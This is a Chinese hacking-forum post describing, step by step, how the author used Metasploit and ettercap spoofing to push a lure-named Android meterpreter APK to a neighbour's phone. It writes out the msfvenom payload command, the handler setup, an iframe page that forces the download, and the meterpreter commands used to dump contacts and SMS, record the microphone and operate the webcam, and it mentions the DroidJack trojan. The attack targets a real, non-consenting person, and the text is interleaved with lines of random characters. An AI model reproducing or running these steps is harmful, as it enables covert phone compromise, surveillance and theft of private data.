找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2615|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 g. c% T, v& U# W3 Z' r 五、msf+ettercap入侵邻居安卓手机 4 D& t7 D: k( r7 y

$ J8 A$ `& Y# g: }1 |5 P# ~

8 }: n, ?/ b! ~$ S+ G 首先启动msf ; ~7 b8 t& C w" z# r

, b# B' _- P) m5 Q

. v. r' L6 c, p- w6 g 先用kali生成一个安卓木马,如下命令: ( H/ m6 I0 L# M c

& d* E9 `/ D. X1 g, D' Y8 |

* w* P7 L) N3 a& W' `/ d Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ; Q2 w' j% U( k' B

: T6 H6 _( C) L! K3 k$ o

) |: [7 l+ t, d; B3 {8 M. G 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 6 @0 D' V' }, s

S% d A6 r6 m, m4 Z

* |' k4 `/ k. k1 A4 T. { 然后进入msf % {" d( {9 E9 e0 d: o K1 r: n: O

5 F( f4 d: m+ a: V# _

" m+ p& v& w1 V4 O3 ^" Y use exploit/multi/handler & U' W0 q+ U" X$ |* r% Y

1 n5 X4 k5 C( g/ t, o& ?! {

3 V0 r; v/ @+ u, s set payload android/meterpreter/reverse_tcp 9 S7 v0 O. b$ i

7 c8 k: Y0 J" @3 S. ?' g& E0 w

5 p+ u& _$ y& |# \7 o set LHOST 192.168.0.109 //ipkailiip 6 [$ `/ Q) H5 n5 F0 J7 u

$ ?9 h* a" |& c& `7 W! w* }2 H

2 t6 o D3 R' E1 B! } set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ! v( \, E+ _! Y" R+ C1 \+ O

9 z+ q- i' d$ D) d( G5 L3 j

+ O8 I5 W, O4 L2 b6 M: t Exploit 9 z4 ^9 l7 u) E( }3 C; o

& `9 @' Z4 |4 G

& I( A0 S0 `; t4 K   1 @* V4 F3 g6 E% R; p, m# o' S$ N

+ D7 A* B1 O. L! [( m5 Q/ X

( l+ ]) I7 b' \. e; n j8 Y4 J 下面我们开启ettercap -G ) y' a1 X( b$ U2 s

- c+ J5 l6 \0 e

$ v0 f; h* ]8 y6 |2 e; q: g 我物理IP ' n/ S& C; `& j) q( @

7 T" Y. a5 i( s; d: O% F

5 `" A7 o* ~ z, @/ P( _   # H1 ^! x/ F0 n2 b# {8 D

& |! M) D+ a% B- `! O

% R. v* T g. M0 _3 E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, : b. B# z8 v+ N" O2 k2 K( I) {

: ]$ n% Z, `3 _9 t4 r

1 C7 {6 X6 y- D/ l+ q; x3 u% { 下面我们来设置一下 / C* q2 e! i }* r' X2 D" E

8 ^5 ]5 M' s$ R9 Z( R: \) G

4 h% N" R, K0 y3 M7 f- p   & P) B- ?9 G2 B/ z( f: c

" R5 i. z+ G# g+ s

. S$ f! _3 w/ h" m 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , J, s3 `1 N, N: z7 i, o3 i

$ P7 z4 Q p8 K- N: ?

" m- e" V) t: R Y- J* w5 d/ B( x   : V8 F4 B; P- t# T+ b, ?/ y: _

9 m1 X3 ~+ a: ^. U& F9 ^

( U1 p- m" ~# X Q* O" c   C4 _1 _) u6 \- L- _( K6 I

+ e9 Z( o# @% T! P! G% t

: c- g& s: r. Y e1 R   - }5 Z6 x& r& k/ T- `' _

+ _6 V% b) z1 B6 A0 z" o

, s6 D8 q( e+ u" t: a' {# ~+ P   # l8 I5 Z( p! u% H7 p+ R; v

5 h1 K" F9 }: S6 |& Y, `

* S! }0 h- Q; v( ?   ( z- x7 ]6 I+ S2 x

5 ]5 a, M) G* L& a- C- c

# J' e9 M$ z9 }% K3 ?) m5 g3 N/ d* m   & b, O$ R5 z8 M2 R0 ^% D2 V

9 D) @! o; a# b' @

$ Q5 E* e8 Q. g7 y7 e   1 z; P; b7 n7 r+ O+ o' T; s* P

: V3 Q; W9 C: O/ K; m

6 A8 ?' b1 ^4 n& I/ v   0 z# O' [' O+ ^5 E4 [% V% }5 i! @6 G

5 e: _ q/ N+ }' a( v B' H6 X

# V. Z4 W7 x N9 N) z   5 G8 J5 V" y* A

& u. k& a# }; E" r

+ z& ?* v) g: j* M- H   # L# p; b" g' N1 l/ n

$ x) O1 W! w/ o) W+ D

! u ]' _/ _: M, c' L$ N+ k   ; ]+ x& S* x% _( `6 m6 I7 C% `

b+ H# v2 ]! ^$ `, @4 c

' ]" ^9 e0 P( c   $ M# {+ }- _ u3 m1 V1 ^2 Z, y

g& t# N1 s3 S$ L# w

/ h- g3 _* e4 F* J   ' Y* X7 [* |! s0 i& K1 B, a, R

& |) C1 o7 y, L5 O8 U

) n; C6 J# H; e+ [ 下面我们开始攻击 % o3 @- J5 B/ X) ]- |

/ t/ u1 `+ a7 r2 P

" R& E. Z. @4 Y6 Y1 Z6 J   % \" D @. Z" a( {' P

1 W$ ~3 ?" j# ~0 g' ^

2 \! q& ^+ e+ @$ i' o' z& P# T% z   - l6 J8 v7 A8 H/ q/ h, l$ R. ~

t! s& C; T* o* h9 _# N2 b

& F: g$ b) b8 L   + r9 Q/ s+ R, O! G2 D1 W

: m0 ?: s) t* ^. c3 B0 j

# N* t g$ K7 E u( c9 w/ S% ?   3 N( l: q' }. ?; Y" c( r8 y

8 L$ G3 I' h3 K6 M7 [% w

( m- ^# `& d+ I! Y# R) h) I   . b' m" m5 r' H$ u% |& e

% @& X2 w; ~8 s3 S: f' o6 ]. n

6 k# R/ d) Q, Z 大概过了5分钟多,发现反弹成功了 & F6 H/ j0 G% W+ P X( Z# [

b# G+ Q1 M2 m, A1 I/ v% I1 i

7 Z6 B) }6 P$ T( h, g, r6 b   8 E# R0 M$ a' b4 \; U7 X

8 t# B: p+ {+ M

) Z6 Y/ x v/ T0 l8 T" B   ! R7 j% |' w+ S, L/ v) G

# D7 p" R( K) u* V

3 h, i! p1 D+ {" @' o5 P4 e3 Q2 W* j   + \& {8 |% D3 p

7 v* s/ \9 @' |* H+ P

0 x! u. r' D9 y   ( v1 J/ B" T! Z; J

h+ A2 o* m( V& b: K* b

+ d8 l1 p1 _* p   & p* I+ O" m3 S, k B

. c( u$ m4 {% Z5 t4 r8 ?4 W5 m

, Y; @8 _& g( L6 c6 C   # `* D: s# m8 \5 Y* x! ^

6 b* K7 T. d) f: n9 v+ h( ]$ U- B

' C! h9 I$ v/ x   . I# _ G. ^: b

$ r$ ~9 W% l9 K! H' f0 W, l& V

! k, D3 _* f3 Q 执行命令 ) ?# \8 n! |; B& l' I9 Y

* S4 ^/ n* j) ]6 |

( N; @& x' |6 A7 x% z; J   + R- L: d. e( D

W# Q0 h7 h! [* P8 \

0 u' \6 |' F) I/ P0 E1 U2 O& G dump_contacts    --》这个是导出电话 ' Z: I, ^: v8 h

. R# v: ]5 ~* q5 F: o

. E4 H& J& j5 c+ y# l dump_sms --》这个是导出信息 7 N/ F4 }; E6 e& a) a+ e

k/ k, T1 g" I& I' W {) i

+ Q3 W$ D' b" ~( W record_mic     Record audio from the default microphone for X seconds , Q! ?" B% z6 ^2 S( X8 d1 P

, H& e0 s' l; z

0 B* i" c {1 O; F6 @     webcam_chat    Start a video chat 8 p! Z" m4 }' q. Q' Z: F* j

$ k2 Y! C9 F& c+ q$ `

9 }1 Y! c0 ~; i' u     webcam_list    List webcams & } R R9 c5 q% V$ Q

5 r4 M2 n. ~3 E3 y% l

2 o) X& f9 o ~$ A) s, I+ j" R     webcam_snap    Take a snapshot from the specified webcam # ^; N' i) Z! k, |6 _' t1 O

l) ?' t- b$ U8 \! V

/ L* D# E: B/ O9 i/ h webcam_stream  lay a video stream from the specified webcam : K7 b/ Q- ?$ K2 }1 k

" K" V/ W. p9 \' M& x! V0 S- X" v

. r' F7 i w( L: C8 @   # B8 T$ D1 a' F( x- H% G

" ~+ q* z: ?+ s4 R

& j; O) r- v. E" w o! q+ q: |   / L9 r9 B, K L4 B

7 o) }! a1 s. @' S% j$ b- ?. j

% K& T8 \7 e. r3 l/ ~9 u, l 我们打开看一下电话薄, # |0 }. p+ Q1 B- _% s% X

$ w/ \( J7 y" j& o" r: J

" @! K8 K8 V9 [ y% X0 f9 ^4 D7 P   8 A8 t# C0 k0 m

5 P2 d6 `$ s, ~; L, N

, C& R% V* |; P$ I) `   ( h5 o3 w* L5 g- ]7 e

' d. t/ F9 f# A) s9 B) _/ v7 _

$ k: s, F3 l D1 X4 u8 {   F0 q3 E4 G0 V$ P$ g

V" a9 Z3 g5 m+ B4 d

, F& n, P1 Y, S _   1 d* F1 W4 k; z

& e$ S' r5 o: \" B! N/ W

# `" I2 e4 s6 f# b   * t* @6 }6 z; k: M& H

7 I) @8 Q& `, I

. }; I! N5 E, |$ V" e4 I9 u$ {$ x   + P# ^& w' Q/ P9 D8 d3 [

( J$ n. u8 N$ f1 C

E+ q. O+ Y, P; o e- F: T; m$ ? 我们同时欺骗成DroidJack木马,使用方法如图: 1 h) _; e6 J u* [$ J

0 b1 F2 M5 L' f: i! q

8 n5 v+ L4 G/ L8 X: k$ x6 i" O   % A) [2 \' G0 q

0 T ~% ]* n8 g5 B; ^2 Z

! L) `/ V' G Q8 d# G   $ {' Y9 e' ^7 X0 }5 w" _0 R

& |9 L; j$ w+ Y: E4 ^& e( B

; ^% n% ~4 P7 P# e* u( @/ q: I; Y   + h% d. o7 D7 L3 S! ^! x

/ }4 Q2 y7 a/ R* T: N- N! e

1 \& F6 i& X [* }7 _ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 8 x; @# L! N; A7 K' E0 c" U; `5 f+ a+ x

3 J- a1 h2 e1 Z: Q

: F; s3 n- } n+ o   1 M1 T0 z$ a' Z4 y9 {

, v+ Z' r& a6 J$ y1 M% _. ]0 [+ @

! M B& e. m- o0 U L   R9 M( a, ^& s6 B& r

" e0 n' }9 J0 W6 S& b3 {

8 |) C0 E2 D8 ]' S* ]$ o   ; l a( v! X. |" V. n, m& S

2 k/ j( p6 z8 C. E

* w0 a0 R0 }. t3 K7 n( p * _5 a* P3 p* k8 s( b

4 ] a& x( Y4 ~+ Z

( j+ j% G, _ e& |0 J
7 o% G% K+ g2 @0 ?" y, k

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表